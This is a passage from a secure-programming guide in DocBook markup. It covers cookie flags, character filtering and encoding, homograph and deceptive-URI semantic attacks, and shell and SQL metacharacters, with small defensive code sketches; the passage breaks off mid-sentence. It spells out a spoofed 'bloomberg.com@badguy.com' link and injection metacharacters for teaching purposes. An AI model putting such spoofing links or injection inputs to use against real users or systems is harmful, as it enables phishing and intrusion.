||
http://www.extremetech.com/article2/0,3973,841047,00.asp
|
||
and the Bugtraq discussion, 23 Jan 2003.
|
||
-->
|
||
</para>
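<para>
In a CGI program written in C, setting the flag is just a matter of
appending it to the cookie header.
The sketch below uses a hypothetical helper name and assumes the cookie
name and value have already been validated; other cookie attributes
(path, expiry, and so on) are left out for brevity.
</para>

```c
#include <stdio.h>

/*
 * Format a Set-Cookie header line with the HttpOnly flag into buffer.
 * name and value are assumed to be already-validated cookie text.
 * Returns 0 on success, -1 if the header does not fit in the buffer.
 */
int format_httponly_cookie(char *buffer, size_t size,
                           const char *name, const char *value)
{
    int written = snprintf(buffer, size,
                           "Set-Cookie: %s=%s; HttpOnly\r\n", name, value);

    return (written < 0 || (size_t) written >= size) ? -1 : 0;
}
```

<para>
The resulting line would be written along with the program's other
response headers, before the blank line that ends them.
</para>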
|
||
|
||
<para>
|
||
The first subsection below discusses how to identify special
|
||
characters that need to be filtered, encoded, or validated.
|
||
This is followed by subsections describing
|
||
how to filter or encode these characters.
|
||
There's no subsection discussing how to validate data in general;
for input validation in general see <xref linkend="input">,
|
||
and if the input is straight HTML text or a URI, see
|
||
<xref linkend="filter-html">.
|
||
Also note that your web application can receive malicious cross-postings,
|
||
so non-queries should forbid the GET method
|
||
(see <xref linkend="avoid-get-non-queries">).
|
||
</para>
|
||
|
||
<sect3>
|
||
<title>Identifying Special Characters</title>
|
||
<para>
|
||
Here are the special characters for a variety of circumstances
|
||
(my thanks to the CERT, who developed this list):
|
||
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
In the content of a block-level element (e.g.,
|
||
in the middle of a paragraph of text in HTML or a block in XML):
|
||
<itemizedlist>
|
||
<listitem><para>"&lt;" is special because it introduces a tag.</para></listitem>
<listitem><para>"&amp;" is special because it introduces a character entity.</para></listitem>
<listitem><para>"&gt;" is special because some browsers treat it as special,
on the assumption that the author of the page really meant
to put in an opening "&lt;", but omitted it in error.</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
In attribute values:
|
||
<itemizedlist>
|
||
<listitem><para>In attribute values enclosed with double quotes, the
|
||
double quotes are special because they mark the end of the attribute value.
|
||
</para></listitem>
|
||
<listitem><para>In attribute values enclosed with single quotes, the single
|
||
quotes are special because they mark the end of the attribute value.
|
||
XML's definition allows single quotes, but I've been told that some
|
||
XML parsers don't handle them correctly, so you might avoid
|
||
using single quotes in XML.
|
||
<!--
|
||
The CERT advisory at
|
||
http://www.cert.org/tech_tips/malicious_code_mitigation.html
|
||
once said they weren't legal; Daniel Naber noted that
|
||
this sentence isn't there now:
|
||
|
||
"Note that these aren't legal in XML, so I would recommend not using these."
|
||
-->
|
||
</para></listitem>
|
||
<listitem><para>Attribute values without any quotes make the white-space
|
||
characters such as space and tab special.
|
||
Note that these aren't legal in XML either, <emphasis>and</emphasis>
|
||
they make more characters special.
|
||
Thus, I recommend against unquoted attributes if you're using
|
||
dynamically generated values in them.
|
||
</para></listitem>
|
||
<listitem><para>"&" is special when used in conjunction with
|
||
some attributes because it introduces a character entity.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
In URLs: for example, a search engine might provide a link within
|
||
the results page that the user can click to re-run the search. This
|
||
can be implemented by encoding the search query inside the URL. When
|
||
this is done, it introduces additional special characters:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Space, tab, and new line are special because they mark the
|
||
end of the URL.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
"&" is special because it introduces a character
|
||
entity or separates CGI parameters.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Non-ASCII characters (that is, everything above 127 in the
|
||
ISO-8859-1 encoding) aren't allowed in URLs, so they are all
|
||
special here.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
The "%" must be filtered from input anywhere parameters
|
||
encoded with HTTP escape sequences are decoded by server-side
|
||
code. The percent must be filtered if input such as
|
||
"%68%65%6C%6C%6F" becomes "hello" when it appears on the web
|
||
page in question.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Within the body of a <SCRIPT> </SCRIPT>
|
||
the semicolon, parentheses, curly braces, and new line
|
||
should be filtered in situations where text could be inserted
|
||
directly into a preexisting script tag.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Server-side scripts that convert any exclamation
|
||
characters (!) in input to double-quote characters (") on
|
||
output might require additional filtering.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
Note that, in general, the ampersand (&) is special in HTML and XML.
|
||
</para>
|
||
|
||
</sect3>
|
||
|
||
<sect3>
|
||
<title>Filtering</title>
|
||
<para>
|
||
One approach to handling these special characters is simply
|
||
eliminating them (usually during input or output).
|
||
</para>
|
||
|
||
<para>
|
||
If you're already validating your input for valid characters
|
||
(and you generally should), this is easily done by simply omitting the
|
||
special characters from the list of valid characters.
|
||
Here's an example in Perl of a filter that only accepts legal
|
||
characters, and since the filter doesn't accept any special characters
|
||
other than the space, it's quite acceptable for use in areas such as
|
||
a quoted attribute:
|
||
<programlisting>
|
||
# Accept only legal characters:
|
||
$summary =~ tr/A-Za-z0-9\ \.\://dc;
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
However, if you really want to strip away <emphasis>only</emphasis>
|
||
the smallest number of characters, then you could create a subroutine
|
||
to remove just those characters:
|
||
<programlisting>
|
||
# Remove the characters that are special in HTML, URLs, or scripts.
sub remove_special_chars {
  my ($s) = @_;
  $s =~ s/[<>"'%;()&+]//g;
  return $s;
}
# Sample use:
$data = remove_special_chars($data);
|
||
</programlisting>
|
||
</para>
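<para>
For comparison, here is a minimal Python sketch of the same two
filters, assuming the same character sets as the Perl examples above.
The function name keep_legal_chars is made up for this illustration;
adjust the allowed set to suit your own data.
</para>

```python
import re

# Whitelist: letters, digits, space, '.' and ':' (mirrors the Perl tr/// example).
_NOT_ALLOWED = re.compile(r"[^A-Za-z0-9 .:]")

# Blacklist: the same special characters removed by the Perl subroutine.
_SPECIAL = re.compile(r"[<>\"'%;()&+]")


def keep_legal_chars(text: str) -> str:
    """Delete every character that is not explicitly allowed."""
    return _NOT_ALLOWED.sub("", text)


def remove_special_chars(text: str) -> str:
    """Delete only the listed special characters; everything else is kept."""
    return _SPECIAL.sub("", text)
```

<para>
The whitelist version is usually the safer choice, since anything
you forgot to think about is removed by default.
</para>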
|
||
</sect3>
|
||
|
||
<sect3>
|
||
<title>Encoding (Quoting)</title>
|
||
<para>
|
||
An alternative to removing the special characters is to encode them
|
||
so that they don't have any special meaning.
|
||
This has several advantages over filtering the characters;
|
||
in particular, it prevents data loss.
|
||
If the data is "mangled" by the process from the user's point of view,
|
||
at least when the data is encoded it's possible to reconstruct the
|
||
data that was originally sent.
|
||
</para>
|
||
|
||
<para>
|
||
HTML, XML, and SGML all use the ampersand ("&") character as a
|
||
way to introduce encodings in the running text; this encoding
|
||
is often called ``HTML encoding.''
|
||
To encode these characters, simply transform the special characters
|
||
in your circumstance. Usually this means
|
||
'<' becomes '&lt;',
|
||
'>' becomes '&gt;',
|
||
'&' becomes '&amp;', and
|
||
'"' becomes '&quot;'.
|
||
As noted above, although in theory '>' doesn't need to be quoted,
|
||
because some browsers act on it (and fill in a '<') it needs to be quoted.
|
||
There's a minor complexity with the double-quote character,
|
||
because '&quot;' only needs to be
|
||
used inside attributes, and some extremely old browsers don't
|
||
properly render it.
|
||
If you can handle the additional complexity, you can try to encode '"'
|
||
only when you need to, but it's easier to simply encode it and ask
|
||
users to upgrade their browsers.
|
||
Few users will use such ancient browsers, and the double-quote character
|
||
encoding has been a standard for a long time.
|
||
</para>
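<para>
As a small illustration of the transformation described above, the
following Python sketch uses the standard library's html.escape.
The wrapper name html_encode is only an illustrative choice.
Note that html.escape also encodes the single quote, which goes
slightly beyond the four characters listed above.
</para>

```python
import html


def html_encode(text: str) -> str:
    """Encode &, <, >, and both quote characters for use in HTML output."""
    # quote=True also encodes '"' (as &quot;) and "'" (as &#x27;),
    # so the result can be placed inside a quoted attribute value.
    return html.escape(text, quote=True)
```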
|
||
|
||
<para>
|
||
Designers of scripting languages might consider implementing specialized
auto-quoting types, an interesting approach developed in the web application framework
|
||
<ulink url="http://www.mems-exchange.org/software/quixote">Quixote</ulink>.
|
||
Quixote includes a "template" feature which allows easy mixing of HTML text
|
||
and Python code; text generated by a template is passed back to the web browser
|
||
as an HTML document.
|
||
As of version 0.6, Quixote has two kinds of text (instead of a single
|
||
kind, as in most such languages).
|
||
Anything which appears in a literal, quoted string is of type "htmltext,"
|
||
and it is assumed to be exactly as the programmer wanted it to be
|
||
(this is reasonable, since the programmer wrote it).
|
||
Anything which takes the form of an ordinary Python string, however,
|
||
is automatically quoted as the template is executed.
|
||
As a result, text from a database or other external source is
|
||
automatically quoted, and cannot be used for a cross-site scripting attack.
|
||
Thus, Quixote implements a safe default -
|
||
programmers no longer need to worry about quoting every bit of text
|
||
that passes through the application (bugs involving too much quoting
|
||
are less likely to be a security problem, and will be obvious in testing).
|
||
Quixote uses an open source software license
(though because of its venue identification it is probably GPL-incompatible), and is used by
|
||
organizations such as the
|
||
<ulink url="http://lwn.net">Linux Weekly News</ulink>.
|
||
<!-- See http://lwn.net/Articles/19552/ -->
|
||
</para>
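<para>
The idea of two kinds of text can be sketched in a few lines of Python.
This is not Quixote's actual implementation or API; the class name
HtmlText and the helper quote are hypothetical, and the sketch only
handles string concatenation.
</para>

```python
import html


class HtmlText:
    """Text the programmer has declared to be trusted HTML markup."""

    def __init__(self, markup: str):
        self._markup = markup

    def __str__(self) -> str:
        return self._markup

    def __add__(self, other):
        # Anything that is not already HtmlText is quoted before joining.
        return HtmlText(self._markup + str(quote(other)))

    def __radd__(self, other):
        return HtmlText(str(quote(other)) + self._markup)


def quote(value) -> HtmlText:
    """Return value unchanged if trusted, otherwise HTML-encode it."""
    if isinstance(value, HtmlText):
        return value
    return HtmlText(html.escape(str(value), quote=True))
```

<para>
With such a type, HtmlText("<p>") + user_input + HtmlText("</p>")
encodes user_input automatically, so forgetting to quote is no longer
the default outcome.
</para>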
|
||
|
||
<para>
|
||
This approach to HTML encoding
|
||
isn't quite enough encoding in some circumstances.
|
||
As discussed in <xref linkend="output-character-encoding">,
|
||
you need to specify the output character encoding (the ``charset'').
|
||
<!-- A list of character encodings is at
|
||
ftp://ftp.isi.edu/in-notes/iana/assignments/character-sets; this
|
||
is referenced in the HTML 4.01 spec -->
|
||
If some of your data is encoded using a different character encoding
|
||
than the output character encoding, then you'll need to do something so your
|
||
output uses a consistent and correct encoding.
|
||
Also, if you've selected an output encoding other than
|
||
ISO-8859-1, then you need to
|
||
make sure that any alternative encodings for special characters
|
||
(such as "<") can't slip through to the browser.
|
||
This is a problem with several character encodings, including popular ones
|
||
like UTF-7 and UTF-8; see <xref linkend="character-encoding">
|
||
for more information on how to prevent ``alternative'' encodings of characters.
|
||
<!-- Is it possible to slip through even with ISO-8859-1? I don't see
|
||
a way to do it, so I'm not raising that concern. -->
|
||
One way to deal with incompatible character encodings is to
|
||
first translate the characters internally to ISO 10646 (which has
|
||
the same character values as Unicode), and then
|
||
use either numeric character references or character entity
|
||
references to represent them:
|
||
<itemizedlist>
|
||
<listitem><para>A numeric character reference looks like
|
||
"&#D;", where D is a decimal number, or
|
||
"&#xH;" or "&#XH;", where H is a hexadecimal number.
|
||
The number given is the ISO 10646 character id (which has the same character
|
||
values as Unicode).
|
||
Thus &#1048; is the Cyrillic capital letter "I".
|
||
The hexadecimal system isn't supported in the SGML standard (ISO 8879),
|
||
so I'd suggest using the decimal system for output.
|
||
Also, although the SGML specification
|
||
permits the trailing semicolon to be omitted in
|
||
some circumstances, in practice many systems don't handle it - so
|
||
always include the trailing semicolon.
|
||
</para></listitem>
|
||
<listitem><para>A character entity reference does the same thing but
|
||
uses mnemonic names instead of numbers.
|
||
For example, "&lt;" represents the < sign.
|
||
If you're generating HTML, see the
|
||
<ulink url="http://www.w3.org">HTML specification</ulink> which
|
||
lists all mnemonic names.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Either system (numeric or character entity)
|
||
works; I suggest using character entity references for
|
||
'<', '>', '&', and '"' because it makes your code (and output)
|
||
easier for humans to understand. Other than that, it's not clear
|
||
that one or the other system is uniformly better.
|
||
If you expect humans to edit the output by hand later, use the
|
||
character entity references where you can; otherwise I'd use the
|
||
decimal numeric character references just because they're easier to program.
|
||
This encoding scheme can be quite inefficient for some languages
|
||
(especially Asian languages); if that is your primary content, you
|
||
might choose to use a different character encoding (charset), filter
|
||
on the critical characters (e.g., "<")
|
||
and ensure that no alternative encodings for critical characters are allowed.
|
||
</para>
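<para>
The decimal numeric character reference approach is indeed easy to
program. Here is a minimal Python sketch, assuming the text is already
held as a Unicode string; the function name to_ascii_html is
hypothetical.
</para>

```python
import html


def to_ascii_html(text: str) -> str:
    """HTML-encode text and emit only ASCII characters."""
    # First encode the markup-significant characters as entity references.
    escaped = html.escape(text, quote=True)
    # Then replace every non-ASCII character with a decimal numeric
    # character reference such as &#1048; (always with the semicolon).
    return escaped.encode("ascii", "xmlcharrefreplace").decode("ascii")
```

<para>
Because the output is pure ASCII, it does not matter much which
ASCII-compatible charset the page finally declares.
</para>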
|
||
|
||
<para>
|
||
URIs have their own encoding scheme, commonly called ``URL encoding.''
|
||
In this system, each character not permitted in URLs is represented using
a percent sign followed by its two-digit hexadecimal value.
|
||
To handle all of ISO 10646 (Unicode), it's recommended to first translate
|
||
the codes to UTF-8, and then encode each resulting byte.
|
||
See <xref linkend="Validating-uris"> for more about validating URIs.
|
||
</para>
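<para>
A short Python sketch of URL encoding, using the standard
urllib.parse module. The wrapper name url_encode is illustrative, and
passing safe="" (so that even "/" is encoded) is an assumption that
suits a single query value, not a whole URL.
</para>

```python
from urllib.parse import quote, unquote


def url_encode(text: str) -> str:
    """Percent-encode a single URL component, going through UTF-8."""
    # Characters are first converted to UTF-8 bytes; every byte that is
    # not an unreserved character is then written as %XX.
    return quote(text, safe="", encoding="utf-8")
```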
|
||
|
||
|
||
</sect3>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="semantic-attacks">
|
||
<title>Foil Semantic Attacks</title>
|
||
|
||
<para>
|
||
A ``semantic attack'' is an attack in which the attacker uses the
|
||
computing infrastructure/system in a way that fools the victim into
|
||
thinking they are doing one thing while they are actually doing something different,
|
||
yet the computing infrastructure/system is working exactly as it was
|
||
designed to do.
|
||
Semantic attacks often involve financial scams, where the attacker is
|
||
trying to fool the victim into giving the attacker large sums of money
|
||
(e.g., thinking they're investing in something).
|
||
For example, the attacker may try to convince the user that they're
|
||
looking at a trusted website, even if they aren't.
|
||
</para>
|
||
|
||
<para>
|
||
Semantic attacks are difficult to counter, because they're exploiting
|
||
the correct operation of the computer.
|
||
The way to deal with semantic attacks is to help give the human
|
||
additional information, so that when ``odd'' things happen the human
|
||
will have more information or a warning will be presented
|
||
that something may not be what it appears to be.
|
||
</para>
|
||
|
||
<para>
|
||
One example is URIs that, while legitimate, may fool users into
|
||
thinking they have a different meaning.
|
||
For example, look at this URI:
|
||
<programlisting>
|
||
http://www.bloomberg.com@www.badguy.com
|
||
</programlisting>
|
||
If a user clicked on that URI, they might think that they're going
|
||
to Bloomberg (who provide financial commodities news), but instead
|
||
they're going to www.badguy.com (and providing the username
|
||
www.bloomberg.com, which www.badguy.com will conveniently ignore).
|
||
If the badguy.com website then imitated the bloomberg.com site,
|
||
a user might be convinced that they're seeing the real thing
|
||
(and make investment decisions based on attacker-controlled
|
||
information).
|
||
This depends on URIs being used in an unusual way - clickable URIs
|
||
can have usernames, but usually don't.
|
||
One solution for this case is for the web browser to detect such unusual
|
||
URIs and create a pop-up confirmation widget, saying
|
||
``You are about to log into www.badguy.com as user www.bloomberg.com;
|
||
do you wish to proceed?''
|
||
If the widget allows the user to change these entries, it provides
|
||
additional functionality to the user as well as providing protection
|
||
against that attack.
|
||
</para>
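<para>
A program that displays or follows links can perform the same kind of
check. The following Python sketch uses urllib.parse.urlsplit to
separate the user name from the real host; the function name
describe_destination and the wording of the warning are made up for
this example.
</para>

```python
from urllib.parse import urlsplit


def describe_destination(uri: str) -> str:
    """Say where a URI really goes, flagging an embedded user name."""
    parts = urlsplit(uri)
    host = parts.hostname or ""
    if parts.username is not None:
        # Everything before the '@' is user information, not the host.
        return f"WARNING: connects to {host} as user {parts.username}"
    return f"connects to {host}"
```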
|
||
|
||
<para>
|
||
Another example is homographs, particularly international homographs.
|
||
Certain letters look similar to each other, and these can be exploited
|
||
as well.
|
||
For example, since 0 (zero) and O (the letter O) look similar to each
|
||
other, users may not realize that WWW.BLOOMBERG.COM and WWW.BL00MBERG.COM
|
||
are different web addresses.
|
||
Other similar-looking letters include 1 (one) and l (lower-case L).
|
||
If international characters are allowed, the situation is worse.
|
||
For example, many Cyrillic letters look essentially the same as
|
||
Roman letters, but the computer will treat them differently.
|
||
Currently most systems don't allow international characters in host names,
|
||
but for various good reasons it's widely agreed that support for them
|
||
will be necessary in the future.
|
||
One proposed solution has been to display letters from different code regions
|
||
using different colors - that way,
|
||
users get more information visually.
|
||
If users look at the URI, they will hopefully notice the strange coloring.
|
||
[Gabrilovich 2002]
|
||
However, this does show the essence of a semantic attack -
|
||
it's difficult to defend against, precisely because the computers are
|
||
working correctly.
|
||
</para>
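<para>
A program can at least notice when a name mixes letters from different
code regions. The Python sketch below is a rough heuristic, not the
coloring scheme proposed above: it assumes that the first word of each
character's Unicode name (such as LATIN or CYRILLIC) is a good enough
stand-in for its script. The function names are hypothetical.
</para>

```python
import unicodedata


def scripts_used(label: str) -> set:
    """Return the set of scripts (approximated) used by the letters in label."""
    scripts = set()
    for ch in label:
        if ch.isalpha():
            # e.g. "CYRILLIC SMALL LETTER O" -> "CYRILLIC"
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts


def looks_mixed(label: str) -> bool:
    """True if the label combines letters from more than one script."""
    return len(scripts_used(label)) > 1
```

<para>
This catches a Cyrillic letter hidden in an otherwise Latin name, but
it does nothing about look-alikes within one script, such as the digit
zero and the letter O.
</para>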
|
||
</sect1>
|
||
|
||
<sect1 id="careful-typing">
|
||
<title>Be Careful with Data Types</title>
|
||
|
||
<para>
|
||
Be careful with the data types used, in particular those used in
|
||
interfaces.
|
||
For example, ``signed'' and ``unsigned'' values are treated differently
|
||
in many languages (such as C or C++).
|
||
<!-- This was the basis of a sysctl() vulnerability -->
|
||
</para>
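<para>
To illustrate the kind of surprise involved, the following Python
sketch uses ctypes to imitate 32-bit C integers (Python's own integers
never wrap around). The limit MAX_LEN and the function names are
assumptions made for this example only.
</para>

```python
import ctypes

MAX_LEN = 1024  # hypothetical upper bound on a length field


def passes_signed_check(length: int) -> bool:
    """A bounds check done on a signed 32-bit value: only the top is guarded."""
    return ctypes.c_int32(length).value <= MAX_LEN


def as_unsigned(length: int) -> int:
    """The same 32 bits, reinterpreted as an unsigned value."""
    return ctypes.c_uint32(length).value
```

<para>
A length of -1 passes the signed check, yet the same bit pattern is
4294967295 once a lower layer treats it as unsigned. Checking both
bounds, or using one type consistently across the interface, avoids
the mismatch.
</para>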
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="call-out">
|
||
<title>Carefully Call Out to Other Resources</title>
|
||
|
||
<epigraph>
|
||
<attribution>Psalms 146:3 (NIV)</attribution>
|
||
<para>
|
||
Do not put your trust in princes, in mortal men, who cannot save.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Practically no program is truly self-contained; nearly all programs
|
||
call out to other programs for resources, such as programs provided
|
||
by the operating system, software libraries, and so on.
|
||
Sometimes this calling out to other resources isn't obvious or involves
|
||
a great deal of ``hidden'' infrastructure which must be depended on,
|
||
e.g., the mechanisms to implement dynamic libraries.
|
||
Clearly, you must be careful about what other resources your program trusts
|
||
and you must make sure that the way you send requests to them is secure.
|
||
</para>
|
||
|
||
<sect1 id="call-only-safe">
|
||
<title>Call Only Safe Library Routines</title>
|
||
|
||
<para>
|
||
Sometimes there is a conflict between security and the development
|
||
principles of abstraction (information hiding) and reuse.
|
||
The problem is that some high-level library routines
|
||
may or may not be implemented securely,
|
||
and their specifications won't tell you.
|
||
Even if a particular implementation is secure, it may not be
|
||
possible to ensure that other versions of the routine
|
||
will be safe, or that the same interface will be safe on other platforms.
|
||
<!-- I once said:
|
||
For example, I've not been able to assure myself that tmpfile(3) is
|
||
secure on all platforms (see (xref linkend="temporary-files"));
|
||
its specifications aren't sufficiently clear to give me confidence of this.
|
||
|
||
However, I've since learned that my fears were justified.
|
||
System V (at least up through 1993) _did_not_ do this safely. -->
|
||
|
||
</para>
|
||
|
||
<para>
|
||
In the end, if your application must be secure, you must sometimes
|
||
re-implement your own versions of library routines.
|
||
Basically, you have to re-implement routines if you can't be sure
|
||
that the library routines will perform the necessary actions you require
|
||
for security.
|
||
Yes, in some cases the library's implementation should be fixed, but
|
||
it's your users who will be hurt if you choose a library routine that
|
||
is a security weakness.
|
||
If you can, try to use the high-level interfaces when you must
|
||
re-implement something - that way, you can switch to the high-level
|
||
interface on systems where its use is secure.
|
||
</para>
|
||
|
||
<para>
|
||
If you can, test to see if the routine is secure or not, and use it if
|
||
it's secure - ideally you can perform this test as part of
|
||
compilation or installation (e.g., as part of an ``autoconf'' script).
|
||
For some conditions this kind of run-time testing is impractical, but
|
||
for other conditions, this can eliminate many problems.
|
||
If you don't want to bother to re-implement the library, at least test
|
||
to make sure it's safe and halt installation if it isn't.
|
||
That way, users will not accidentally install an insecure program and
|
||
will know what the problem is.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="limit-call-outs">
|
||
<title>Limit Call-outs to Valid Values</title>
|
||
|
||
<para>
|
||
Ensure that any call out to another program only permits valid
|
||
and expected values for every parameter.
|
||
This is more difficult than it sounds, because many
|
||
library calls or commands call lower-level routines in potentially
|
||
surprising ways.
|
||
For example, many library calls are implemented indirectly by
|
||
calling the shell, which means that passing characters which are shell
|
||
metacharacters can have dangerous effects.
|
||
So, let's discuss metacharacters.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="handle-metacharacters">
|
||
<title>Handle Metacharacters</title>
|
||
|
||
<para>
|
||
Many systems, such as the command line shell and SQL interpreters,
|
||
have ``metacharacters'', that is, characters in their input
|
||
that are not interpreted as data.
|
||
Such characters might be commands, or delimit data from commands or other data.
|
||
If there's a language specification for that system's interface
|
||
that you're using, then it certainly has metacharacters.
|
||
If your program invokes those other systems and allows attackers to
|
||
insert such metacharacters, the usual result is that an attacker can
|
||
completely control your program.
|
||
</para>
|
||
|
||
<para>
|
||
The most pervasive metacharacter problems are those involving
|
||
shell metacharacters.
|
||
The standard Unix-like command shell (stored in /bin/sh)
|
||
interprets a number of characters specially.
|
||
If these characters are sent to the shell, then their special interpretation
|
||
will be used unless escaped; this fact can be used to break programs.
|
||
According to the WWW Security FAQ [Stein 1999, Q37], these metacharacters are:
|
||
|
||
<screen width="61">
|
||
& ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ \n \r
|
||
</screen>
|
||
</para>
|
||
|
||
<para>
|
||
I should note that in many situations you'll also want to escape
|
||
the tab and space characters, since they (and the newline) are the default
|
||
parameter separators.
|
||
The separator values can be changed by setting the IFS environment
|
||
variable, but if you can't trust the source of this variable you should
|
||
have thrown it out or reset it anyway as part of your environment
|
||
variable processing.
|
||
</para>
|
||
|
||
<para>
|
||
Unfortunately, in real life this isn't a complete list.
|
||
Here are some other characters that can be problematic:
|
||
<!-- Martin Douda provided this list of ! through *; I added the note
|
||
about control characters -->
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
'!' means ``not'' in an expression (as it does in C);
|
||
if the return value of a program is tested, prepending !
|
||
could fool a script into thinking something had failed when it
|
||
succeeded or vice versa.
|
||
In some shells, the "!" also accesses the command history, which can
|
||
cause real problems.
|
||
In bash, this only occurs for interactive mode, but tcsh
|
||
(a csh clone found in some Linux distributions) uses "!" even in scripts.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
'#' is the comment character; all further text on the line is ignored.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
'-' can be misinterpreted as leading an option (or, as - -, disabling
|
||
all further options). Even if it's in the ``middle'' of a filename,
|
||
if it's preceded by what the shell considers as whitespace you may
|
||
have a problem.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
' ' (space), '\t' (tab), '\n' (newline), '\r' (return),
|
||
'\v' (vertical space), '\f' (form feed),
|
||
and other whitespace characters can have many dangerous effects.
|
||
They may turn a ``single'' filename into multiple arguments, for example,
or turn a single parameter into multiple parameters when stored.
|
||
Newline and return have a number of additional dangers, for example,
|
||
they can be used to create ``spoofed'' log entries in some programs,
|
||
or inserted just before a separate command that is then executed
|
||
(if an underlying protocol uses newlines or returns as command
|
||
separators).
|
||
<!--
|
||
More details at this Bugtraq posting:
|
||
Subject: CRLF Injection
|
||
From: Ulf Harnhammar <ulfh@update.uu.se>
|
||
Date: Tue, 7 May 2002 00:12:10 +0200 (CEST)
|
||
To: bugtraq@securityfocus.com
|
||
-->
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Other control characters (in particular, NUL) may cause problems for
|
||
some shell implementations.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Depending on your usage, it's even conceivable that ``.''
|
||
(the ``run in current shell'') and ``='' (for setting variables) might
|
||
be worrisome characters.
|
||
However, every example I've found so far where these
are issues has other (much worse) security problems.
|
||
</para></listitem>
|
||
|
||
<!--
|
||
'.' run in current shell - also could be harmful alloving to modify
|
||
execution environment
|
||
|
||
'=' for variables, again modifying execution environment
|
||
|
||
(*) depending on programs called from script any other character can cause
|
||
problems.
|
||
-->
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
|
||
<para>
|
||
What makes the shell metacharacters particularly pervasive is
|
||
that several important library calls, such as popen(3) and system(3),
|
||
are implemented by calling the command shell, meaning that they will
|
||
be affected by shell metacharacters too.
|
||
Similarly, execlp(3) and execvp(3) may cause the shell to be called.
|
||
Many guidelines suggest avoiding popen(3), system(3), execlp(3), and execvp(3)
|
||
entirely and using execve(2) directly in C when trying to spawn
a process [Galvin 1998b].
At the least, avoid using system(3) when you can use execve(2);
|
||
since system(3) uses the shell to expand characters, there is more
|
||
opportunity for mischief in system(3).
|
||
In a similar manner the Perl and shell backtick (`) also call a command shell;
|
||
for more information on Perl see <xref linkend="perl">.
|
||
</para>
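<para>
The same principle applies in other languages: pass the program an
argument vector rather than a command string for a shell to parse.
Here is a minimal Python sketch using subprocess.run with a list of
arguments (so no shell is involved). The child command, which simply
writes its first argument back, and the function name echo_via_child
are chosen only for illustration.
</para>

```python
import subprocess
import sys


def echo_via_child(argument: str) -> str:
    """Run a child process that writes its first argument to stdout."""
    # The command is a list, so no shell ever parses the argument: each
    # list element reaches the child as exactly one argv entry.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", argument],
        capture_output=True,
        text=True,
        check=True,  # raise an exception if the child fails
    )
    return result.stdout
```

<para>
Shell metacharacters in the argument arrive in the child as ordinary
data. Passing the same text inside a single command string with
shell=True would instead let the shell interpret them.
</para>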
|
||
|
||
<para>
|
||
Since SQL also has metacharacters, a similar issue revolves around
|
||
calls to SQL.
|
||
When input containing metacharacters is used to subvert an SQL command,
|
||
it's often called "SQL injection".
|
||
See
|
||
<ulink url="http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf">
|
||
SPI Dynamics' paper ``SQL Injection: Are your Web Applications Vulnerable?''
|
||
</ulink>
|
||
for further discussion on this.
|
||
As discussed in <xref linkend="input">,
|
||
define a very limited pattern and only allow data matching that
|
||
pattern to enter; if you limit your pattern to ^[0-9]$ or
|
||
^[0-9A-Za-z]*$ then you won't have a problem.
|
||
If you must handle data that may include SQL metacharacters, a good approach
|
||
is to convert it (as early as possible) to some other encoding before
|
||
storage, e.g.,
|
||
HTML encoding (in which case you'll need to encode any ampersand characters
|
||
too).
|
||
Also, prepend and append a quote to all user input, even
|
||
if the data is numeric; that way, insertions of white space and other
|
||
kinds of data won't be as dangerous.
|
||
</para>
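<para>
Here is a small Python sketch of the limited-pattern approach, using
the standard sqlite3 module. It also passes the value through a
placeholder ("?") instead of building the SQL text by hand; that is a
technique added for this example, not one discussed above. The table
and column names are hypothetical.
</para>

```python
import re
import sqlite3

# Only letters and digits are accepted, as in the pattern ^[0-9A-Za-z]*$.
_NAME_PATTERN = re.compile(r"[0-9A-Za-z]*")


def find_user_ids(conn: sqlite3.Connection, name: str) -> list:
    """Look up ids by name, rejecting input outside the allowed pattern."""
    if not _NAME_PATTERN.fullmatch(name):
        raise ValueError("name contains characters outside the allowed set")
    # The driver binds the value separately from the SQL text, so the
    # value is never parsed as part of the SQL command.
    rows = conn.execute("SELECT id FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]
```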
|
||
|
||
<para>
|
||
Forgetting one of these characters can be disastrous; for example,
|
||
many programs omit backslash as a shell metacharacter [rfp 1999].
|
||
As discussed in <xref linkend="input">, a recommended approach
|
||
by some
|
||
is to immediately escape at least all of these characters when they are input.
|
||
But again, by far and away the best approach is to identify which
|
||
characters you wish to permit, and use a filter to only permit
|
||
those characters.
|
||
</para>
|
||
|
||
<para>
|
||
A number of programs, especially those designed for human interaction,
|
||
have ``escape'' codes that perform ``extra'' activities.
|
||
One of the more common (and dangerous) escape codes is one that brings
|
||
up a command line.
|
||
Make sure that these ``escape'' commands can't be included
|
||
(unless you're sure that the specific command is safe).
|
||
For example, many line-oriented mail programs (such as mail or mailx) use
|
||
tilde (~) as an escape character, which can then be used to send a number
|
||
